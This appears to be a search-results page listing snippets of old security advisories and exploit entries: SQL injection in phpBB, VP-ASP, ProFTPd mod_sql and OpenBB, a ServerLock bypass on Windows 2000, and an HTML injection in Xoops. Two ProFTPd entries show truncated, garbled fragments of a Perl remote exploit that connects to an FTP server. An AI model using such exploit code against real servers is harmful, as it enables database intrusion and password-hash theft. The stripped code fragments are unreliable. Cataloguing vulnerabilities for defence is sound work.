287 matches found
[Hat-Squad] phpBB search_id injection exploit
Hello list, Here is the exploit code for phpbb 2.06 sql injection described in http://www.securityfocus.com/archive/1/345872 . It will return MD5 password hash of specified user as highlight variable for viewtopic.php in search results page...
Bypassing ServerLock protection on Windows 2000
Bypassing ServerLock protection on Windows 2000 Jan K. Rutkowski [email protected] 1. Background ServerLock for Windows 2000 is product of Watch Guard company. The purpose of this tool is to protect integrity of the operating system by ensuring that nobody can modify certain files like...
Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection (2)
Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection 2 source: https://www.securityfocus.com/bid/8159/info It has been reported that VP-ASP does not sufficiently sanitize user input passed to the shopexd.asp script contained in the software. As a result, it may be possible for remote...
ProFTPd 1.2.9 RC1 - mod_sql SQL Injection
ProFTPd 1.2.9 RC1 - modsql SQL Injection !/usr/bin/perl ProFTPD 1.2.9 rc1 modsql SQL Injection remote Exploit Spaine - 2003 use IO::Socket; if@ARGC 1=Alternate query\n\n"; exit0; ; $server = $ARGV0; $query = $ARGV1; $remote = IO::Socket::INET-newProto="tcp",PeerAddr=$server,PeerPort="21",Reuse=1 ...
ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection
!/usr/bin/perl ProFTPD 1.2.9 rc1 modsql SQL Injection remote Exploit Spaine - 2003 use IO::Socket; if@ARGC 1=Alternate query\n\n"; exit0; ; $server = $ARGV0; $query = $ARGV1; $remote = IO::Socket::INET-newProto="tcp",PeerAddr=$server,PeerPort="21",Reuse=1 or die "Can't connect. \n"; ifdefined$lin...
OpenBB 1.0/1.1 - 'index.php' SQL Injection
source: https://www.securityfocus.com/bid/7401/info It has been reported that OpenBB does not properly check input passed via the 'index.php' script. Because of this, an attacker may be able to inject arbitrary commands to the database in the context of the bulletin board software. The consequenc...
Xoops 1.3.5 - Private Message System Font Attributes HTML Injection
Xoops 1.3.5 - Private Message System Font Attributes HTML Injection source: https://www.securityfocus.com/bid/6344/info Xoops includes a Private Message System for users, so that they may send messages to one another. HTML tags used for font attributes are not sufficiently filtered of malicious...